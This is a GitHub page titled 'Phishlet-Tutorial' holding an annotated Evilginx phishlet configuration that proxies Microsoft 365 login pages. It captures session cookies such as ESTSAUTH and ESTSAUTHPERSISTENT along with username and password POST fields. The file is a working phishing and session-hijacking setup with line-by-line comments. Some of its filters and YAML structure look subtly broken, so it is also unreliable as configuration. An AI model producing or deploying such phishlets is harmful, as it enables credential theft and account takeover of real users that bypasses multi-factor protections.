-
Notifications
You must be signed in to change notification settings - Fork 9
/
Phishlet-Tutorial
146 lines (87 loc) · 3.36 KB
/
Phishlet-Tutorial
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
Here is an expanded explanation of the Microsoft 365 phishlet example line by line:
# Name of the phishlet for identification
name: 'microsoft 365'
# Specifies minimum Evilginx version required for compatibility
min_ver: '3.0.0'
# Defines hosts to be proxied between visitor and legitimate websites
proxy_hosts:
# The subdomain that will be used for the phishing hostname
- phish_sub: 'login'
# The original Microsoft subdomain that is being mimicked
- orig_sub: 'login'
# The original Microsoft domain that is being mimicked
- domain: 'microsoftonline.com'
# Enable session cookie capture for this host
- session: true
# Indicates this host will be used for the phishing landing page URL
- is_landing: true
# Second entry for another host to proxy
- phish_sub: 'account'
- orig_sub: 'account'
- domain: 'microsoftonline.com'
- session: false # Disable cookie capture for this host
- is_landing: false # Not the landing page
# Defines filters to modify proxied website content
sub_filters:
# Hostname that triggers this filter
- triggers_on: 'login.microsoftonline.com'
# Original subdomain to find and replace
- orig_sub: 'login'
# Original domain to find and replace
- domain: 'microsoftonline.com'
# Search regex to find strings in responses
- search: 'https://{hostname}/ppsecure/'
# Replacement string for matches
- replace: 'https://{hostname}/ppsecure/'
# MIME types that trigger filter
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}/GetCredentialType.srf'
- replace: 'https://{hostname}/GetCredentialType.srf'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}/GetSessionState.srf'
- replace: 'https://{hostname}/GetSessionState.srf'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'href="https://{hostname}'
- replace: 'href="https://{hostname}'
- mimes: ['text/html', 'application/json', 'application/javascript']
# Next filter entry
- triggers_on: 'login.microsoftonline.com'
- orig_sub: 'login'
- domain: 'microsoftonline.com'
- search: 'https://{hostname}'
- replace: 'https://{hostname}'
- mimes: ['text/html', 'application/json', 'application/javascript']
- redirect_only: true # Only on redirected URLs
# Defines session cookies to capture
auth_tokens:
# Domain to capture cookies from
- domain: '.login.microsoftonline.com'
# Names of cookies to capture
- keys: ['ESTSAUTH:always' , 'ESTSAUTHPERSISTENT' , 'SignInStateCookie:always']
- type: 'cookie' # Indicates cookie capture
# Specifies credentials POST data to capture
credentials:
# POST parameter name for username
- key: 'login'
- search: '(.*)' # Regex to extract value
- type: 'post' # POST data
# POST parameter for password
- key: 'passwd'
- search: '(.*)'
- type: 'post'
# Sets domain and path of the login page
login:
- domain: 'login.microsoftonline.com'
- path: '/?auth=2'